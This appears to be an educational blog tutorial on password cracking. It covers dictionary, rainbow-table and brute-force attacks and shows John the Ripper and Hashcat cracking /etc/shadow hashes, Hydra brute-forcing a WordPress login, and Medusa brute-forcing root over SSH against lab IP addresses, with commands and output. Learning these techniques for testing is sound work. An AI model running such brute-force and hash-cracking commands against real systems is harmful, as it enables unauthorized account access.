Table of Contents


Introduction

password-cracking

Passwords are the most widely used form of authentication throughout the world. A username and password are used for logging in your social media accounts, banks, etc.

Password cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach is to try guesses for the password and check them against an available cryptpgraphic has of the password. This process is often called as the brute-force attack.

In general, passwords are not stored in clear text. In fact, passwords are stored as hashes. Hashes or hash values are the values returned by a function, called as the hash-function, which is used to map data of arbiitrary size to data of fixed size.

Types of attacks

Dictionary Attacks

A dictionary attack is the simplest and fastest password cracking attack. The implementation of the attack simply runs through a dictionary of words trying each one of them to see if they work. This attack is possible because the computers now-a-days have performance capabilities. This is usually the first approaching for password cracking.

Rainbow Table Attacks

Mostly, passwords are not stored in plaintext. They are mostly stored in the form of a hash. Hence, even if the attacker dumps the passwords, all he gets is the hash value of the password, which cannot be used to authenticate. One way to crack this encryption is to take the dictionary file, hash each word and compare it to the hashed password. But this is very time consuming. A faster approach would be to take a table with all the words in the dictionary already hashed, and compare this hash with the found password hash. This type of attack is called Rainbow Table Attack.

Brute-Force Attacks

This type of attack is the most type consuming approach. This should be your last resort to crack the password. Brute-force attack techniques tries to attempt all the possibilities of all the letters, numbers and special characters that can be combined to generate a password. Hence, this technique requires a lot of computing power.

Password Cracking Strategy

Expert password crackers have a strategy. They don’t expect to be able to crack every password, but with a well-developed strategy, they can crack most passwords in a very short amount of time.


John

John The Ripper is one of the well-known password cracking tool. It is a command line tool for Linux only. That’s why it is a faster cracking tool. One of the beauties of this tool is its built in default password cracking strategy.

First, it attempts a dictionary attack and if that fails, it then attempts to use combined dictionary words, then tries a hybrid attack of dictionary words with special characters and numbers and only if all those fail will it resort to a brute-force.

[email protected]:~# unshadow passwd shadow > unshadowed.txt
[email protected]:~# john --wordlist=/usr/share/john/password.lst --rules unshadowed.txt 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 1 password hash (sha512crypt [64/64])
toor             (root)
guesses: 1  time: 0:00:00:07 DONE (Mon May 19 08:13:05 2014)  c/s: 482  trying: 1701d - andrew
Use the "--show" option to display all of the cracked passwords reliably

Hashcat

Hashcat is supposed to be the fastest password recovery tool. Examples of hashcat-supported hashing algorithms are Microsoft LM hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, and Cisco PIX.

Core attack types

  • Dictionary Attack
    Trying all words in a list; also called straight mode (attack mode 0, -a 0)

  • Combinator Attack
    Concatenating words from multiple wordlists (mode 1)

  • Brute-force Attack and Mask Attack Trying all characters from given charsets, per position (mode 3)
  • Hybrid Attack
    Combining wordlists+masks (mode 6) and masks+wordlists(mode 7)

Generic hash types

hash-types

To crack the password

  • Grab the hashes
    One way to get the hashes is to use the hash from the /etc/shadow file.

get-hashes

The type of hashing used is the SHA512 algorithm.

  • Choose your wordlist
    There are many wordlists available. To find the wordlists available, type the command
[email protected]:/# locate wordlist
  • Crack the hashes
    Now that we know the type of encryption, we are ready to crack the hash. Let’s first put the hashes into a file which can be used for further cracking. Let’s put it into file named hash.lst.

hash-lst

To prepare this file for cracking, we need to remove all of the information in this file, except the hashes. The /etc/shadow file includes the username, then the salted hash, and then information about the applicable user policy. We need to remove all that information leaving just the hash.

We can see that this file starts with the username, i.e., “user1”, “user2”, etc. Open this file in your favorite text editor and delete the username and the following colon. Then, go to the end of the line and remove the information after the hash that starts with a colon (:). Now we will have a file with just the hashes and nothing else.

The final step is to crack the hash. This is the command used to crack the above hash:

kali > hashcat -m 1800 -a 0 -o plaintext.txt --remove hash.lst /usr/share/sqlmap/txt/wordlist.txt
Paramater Description
-m 1800 Type of hash (SHA-512)
-a 0 Dictionary attack
-o plaintext.txt Output file for the cracked passwords
--remove Remove the hash after it has been cracked
hash.lst Input file of hashes
/usr/share/sqlmap/txt/wordlist.txt Path to the wordlist for the attack

Now, open the plaintext.txt file to view our cracked passwords!


Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Supported Prototcols
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

The following snippet shows how to bruteforce ftp login, with username admin and a password wordlist password.lst

hydra-ftp-op

Check the line [21][ftp].
It mentions the username/password combination that worked for the ftp server. Quite easy!

Let’s see how we can use Hydra to brute-force HTTP form using POST request.

[email protected]:~# hydra -l elliot -P fsocity.dic.uniq 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 64
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:11:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:1/p:0), ~11452 tries per task
[DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect
[STATUS] 2084.00 tries/min, 2084 tries in 00:00h, 0 to do in 01:00h, 9368 active
[80][http-post-form] host: 10.10.10.129   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 64 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:13:57

The string: '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' consists of POST parameters passed to the form.

The keywords ^USER^ and ^PASS^ is used to decide which parameters will consist username and password.

Some of the flags used for Hydra:

Flag Description
-t Number of parallel Threads
-l Single Username
-L Provide Wordlist for Username
-P Provide Wordlist for Password
-p Single Password
http-post-form To use HTTP POST request
https-post-form To use HTTPS POST request
F=<string> A string containing failure message

Medusa

Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

  • Thread-based parallel testing
  • Flexible user input
  • Modular design
  • Multiple protocols supported (SMB, HTTP, POP3, MS-SQL, SSHv2)

Supported Protocols
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

Some of the flags used:

Flag Description
-h [TARGET] Target hostname or IP address
-u [TARGET] Target username
-U [FILE] Read target usernames from a wordlist file
-p [TARGET] Target password
-P [FILE] Read target passwords from a wordlist file
-O [FILE] Write the log into a file
-M [TEXT] Module to execute (without .mod extension)
-n [NUM] Use for non-default TCP port number
-t [NUM] Number of threads for concurrent login
-v [NUM] Set verbose level (0 - 6). Default is 5

Example of medusa to brute-force SSH login

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

Other Password Cracking Tools

There are many more password cracking tools available. Every tools has it’s Pros and Cons. Some of the other tools available are:


Share the fun!